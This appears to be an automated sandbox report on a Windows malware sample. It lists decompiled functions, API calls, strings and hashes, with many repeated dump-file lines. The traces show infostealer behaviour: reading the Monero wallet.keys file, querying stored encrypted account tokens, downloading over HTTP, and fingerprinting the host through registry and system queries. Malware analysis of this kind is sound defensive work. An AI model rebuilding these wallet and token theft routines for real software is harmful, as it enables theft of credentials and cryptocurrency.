Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID: (^$h^
API String ID: 690832082-2418862267
Opcode ID: 85c5b41a1663ad6f6e9b6056fe8d19d93038381bf8277ce1c85f10868c06bc55
Instruction ID: ea81e2540e81b80fc2f1fe36ed8be0dfb26e4e40fcdfa5d36cce9dfd629ff640
Opcode Fuzzy Hash: 85c5b41a1663ad6f6e9b6056fe8d19d93038381bf8277ce1c85f10868c06bc55
Instruction Fuzzy Hash: 7941BBB6D001086BDB24EBA0DD56FFE777DAB48300F40855CB61957181EA755B88CBE3

Function 00ABBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

lstrlen.KERNEL32(00000000), ref: 00ABBC9F

Part of subcall function 00AC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AC8E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 00ABBCCD
lstrlen.KERNEL32(00000000), ref: 00ABBDA5
lstrlen.KERNEL32(00000000), ref: 00ABBDB9

Strings

AccountTokens, xrefs: 00ABBABA
SELECT service, encrypted_token FROM token_service, xrefs: 00ABBBEB
AccountTokens, xrefs: 00ABBB49
AccountId, xrefs: 00ABBCC4

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 21e36609738e9bcc1ccd6a51be3ebbb87cb6edd31f350204f438c72ee22a8079
Instruction ID: e8776a3be7abc0581d85e47ba9242d31b7fe7699ff0ad8afbdd5965d32ec6c75
Opcode Fuzzy Hash: 21e36609738e9bcc1ccd6a51be3ebbb87cb6edd31f350204f438c72ee22a8079
Instruction Fuzzy Hash: 7AB1FD72910108ABDB14FBA0DE96FFE7338AF64304F41455DF506A6192EF346A49CBA2

Function 00AB4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AB4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00AB4FD1
InternetOpenA.WININET(00AD0DDF,00000000,00000000,00000000,00000000), ref: 00AB4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AB5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AB5041
InternetCloseHandle.WININET(?), ref: 00AB50B9
InternetCloseHandle.WININET(?), ref: 00AB50C6

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 16772b5373bd88a3125e26b0dd3989213712837c90078fa611371936650554b2
Instruction ID: 33552f71195df9ecde2fa41e8582ee6081cfe034bbbde4a935a69a6f02e7e7bb
Opcode Fuzzy Hash: 16772b5373bd88a3125e26b0dd3989213712837c90078fa611371936650554b2
Instruction Fuzzy Hash: C331F7F4A40218ABDB20DF54DD85BECB7B8EB48704F5081D9EA09A7281D7706EC5CF99

Function 00AC83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AC8426
wsprintfA.USER32 ref: 00AC8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00AC847B
RegCloseKey.ADVAPI32(00000000), ref: 00AC848C
RegCloseKey.ADVAPI32(00000000), ref: 00AC8499

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

RegQueryValueExA.KERNEL32(00000000,005EF4C8,00000000,000F003F,?,00000400), ref: 00AC84EC
lstrlen.KERNEL32(?), ref: 00AC8501
RegQueryValueExA.KERNEL32(00000000,005EF540,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00AD0B34), ref: 00AC8599
RegCloseKey.KERNEL32(00000000), ref: 00AC8608
RegCloseKey.ADVAPI32(00000000), ref: 00AC861A

Strings

%s\%s, xrefs: 00AC844D

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: c90139ed0b8609c11afc93867a9b3dfd955c21b36226e80733e78e2515ebb077
Instruction ID: e24bbf9c9856d0f0d746d09f010ec680ee8bd4992a58516ef2b3aa622d1285a3
Opcode Fuzzy Hash: c90139ed0b8609c11afc93867a9b3dfd955c21b36226e80733e78e2515ebb077
Instruction Fuzzy Hash: D221E7B191021CABDB24DB54DC85FE9B3B8FB48704F00C599E609A6180DF756A85CFD5

Function 00AC7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC76A4
RtlAllocateHeap.NTDLL(00000000), ref: 00AC76AB
RegOpenKeyExA.KERNEL32(80000002,005DB768,00000000,00020119,00000000), ref: 00AC76DD
RegQueryValueExA.KERNEL32(00000000,005EF450,00000000,00000000,?,000000FF), ref: 00AC76FE
RegCloseKey.ADVAPI32(00000000), ref: 00AC7708

Strings

Windows 11, xrefs: 00AC76BD

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 321e91244d14cc8630ba7bf79c4555103fb966ff010c6f27a95bfdb21b44ab62
Instruction ID: 115e83f9d2cd3fbbe78e7f0323c129b371fcea51ee1818db18e9c003afa7bbbe
Opcode Fuzzy Hash: 321e91244d14cc8630ba7bf79c4555103fb966ff010c6f27a95bfdb21b44ab62
Instruction Fuzzy Hash: 2B01ECB5A44208BBD700DBA4DD49F7DB7B8EB48705F104459FA09D7291E6B4A904CF52

Function 00AC7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7734
RtlAllocateHeap.NTDLL(00000000), ref: 00AC773B
RegOpenKeyExA.KERNEL32(80000002,005DB768,00000000,00020119,00AC76B9), ref: 00AC775B
RegQueryValueExA.KERNEL32(00AC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00AC777A
RegCloseKey.ADVAPI32(00AC76B9), ref: 00AC7784

Strings

CurrentBuildNumber, xrefs: 00AC7771

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: b61426e8f144fd6dc557fee4f9fc079a91ca61e7dfd18070b85590c51213c857
Instruction ID: 99dd9c34e147f9ef937882de88e4ee413d7f585c8fdd57937966f2526f726699
Opcode Fuzzy Hash: b61426e8f144fd6dc557fee4f9fc079a91ca61e7dfd18070b85590c51213c857
Instruction Fuzzy Hash: 9E01F4F5A40308BBD700DBE4DC49FBEF7B8EB48705F104559FA09A7291DAB46600CB52

Function 00AC1A10 Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AC7542
Part of subcall function 00AC7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AC757F
Part of subcall function 00AC7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7603
Part of subcall function 00AC7500: RtlAllocateHeap.NTDLL(00000000), ref: 00AC760A

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00AC7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC76A4
Part of subcall function 00AC7690: RtlAllocateHeap.NTDLL(00000000), ref: 00AC76AB

Part of subcall function 00AC77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00ACDBC0,000000FF,?,00AC1C99,00000000,?,005EE148,00000000,?), ref: 00AC77F2
Part of subcall function 00AC77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00ACDBC0,000000FF,?,00AC1C99,00000000,?,005EE148,00000000,?), ref: 00AC77F9

Part of subcall function 00AC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AB11B7), ref: 00AC7880
Part of subcall function 00AC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7887
Part of subcall function 00AC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AC789F

Part of subcall function 00AC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7910
Part of subcall function 00AC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7917
Part of subcall function 00AC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00AC792F

Part of subcall function 00AC7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AD0E00,00000000,?), ref: 00AC79B0
Part of subcall function 00AC7980: RtlAllocateHeap.NTDLL(00000000), ref: 00AC79B7
Part of subcall function 00AC7980: GetLocalTime.KERNEL32(?,?,?,?,?,00AD0E00,00000000,?), ref: 00AC79C4
Part of subcall function 00AC7980: wsprintfA.USER32 ref: 00AC79F3

Part of subcall function 00AC7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,005EF360,00000000,?,00AD0E10,00000000,?,00000000,00000000), ref: 00AC7A63
Part of subcall function 00AC7A30: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7A6A
Part of subcall function 00AC7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,005EF360,00000000,?,00AD0E10,00000000,?,00000000,00000000,?), ref: 00AC7A7D

Part of subcall function 00AC7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,005EF360,00000000,?,00AD0E10,00000000,?,00000000,00000000), ref: 00AC7B35

Part of subcall function 00AC7B90: GetKeyboardLayoutList.USER32(00000000,00000000,00AD05AF), ref: 00AC7BE1
Part of subcall function 00AC7B90: LocalAlloc.KERNEL32(00000040,?), ref: 00AC7BF9
Part of subcall function 00AC7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00AC7C0D
Part of subcall function 00AC7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AC7C62
Part of subcall function 00AC7B90: LocalFree.KERNEL32(00000000), ref: 00AC7D22

Part of subcall function 00AC7D80: GetSystemPowerStatus.KERNEL32(?), ref: 00AC7DAD

GetCurrentProcessId.KERNEL32(00000000,?,005EE168,00000000,?,00AD0E24,00000000,?,00000000,00000000,?,005EF3D8,00000000,?,00AD0E20,00000000), ref: 00AC207E

Part of subcall function 00AC9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AC9484
Part of subcall function 00AC9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00AC94A5
Part of subcall function 00AC9470: CloseHandle.KERNEL32(00000000), ref: 00AC94AF

Part of subcall function 00AC7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7E37
Part of subcall function 00AC7E00: RtlAllocateHeap.NTDLL(00000000), ref: 00AC7E3E
Part of subcall function 00AC7E00: RegOpenKeyExA.KERNEL32(80000002,005DB7A0,00000000,00020119,?), ref: 00AC7E5E
Part of subcall function 00AC7E00: RegQueryValueExA.KERNEL32(?,005EE308,00000000,00000000,000000FF,000000FF), ref: 00AC7E7F
Part of subcall function 00AC7E00: RegCloseKey.ADVAPI32(?), ref: 00AC7E92

Part of subcall function 00AC7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00AC7FC9
Part of subcall function 00AC7F60: GetLastError.KERNEL32 ref: 00AC7FD8

Part of subcall function 00AC7ED0: GetSystemInfo.KERNEL32(00AD0E2C), ref: 00AC7F00
Part of subcall function 00AC7ED0: wsprintfA.USER32 ref: 00AC7F16

Part of subcall function 00AC8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,005EF5E8,00000000,?,00AD0E2C,00000000,?,00000000), ref: 00AC8130
Part of subcall function 00AC8100: RtlAllocateHeap.NTDLL(00000000), ref: 00AC8137
Part of subcall function 00AC8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00AC8158
Part of subcall function 00AC8100: __aulldiv.LIBCMT ref: 00AC8172
Part of subcall function 00AC8100: __aulldiv.LIBCMT ref: 00AC8180
Part of subcall function 00AC8100: wsprintfA.USER32 ref: 00AC81AC

Part of subcall function 00AC87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AD0E28,00000000,?), ref: 00AC882F
Part of subcall function 00AC87C0: RtlAllocateHeap.NTDLL(00000000), ref: 00AC8836
Part of subcall function 00AC87C0: wsprintfA.USER32 ref: 00AC8850

Part of subcall function 00AC8320: RegOpenKeyExA.KERNEL32(00000000,005EBCD0,00000000,00020019,00000000,00AD05B6), ref: 00AC83A4

Part of subcall function 00AC8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AC8426
Part of subcall function 00AC8320: wsprintfA.USER32 ref: 00AC8459
Part of subcall function 00AC8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00AC847B
Part of subcall function 00AC8320: RegCloseKey.ADVAPI32(00000000), ref: 00AC848C
Part of subcall function 00AC8320: RegCloseKey.ADVAPI32(00000000), ref: 00AC8499

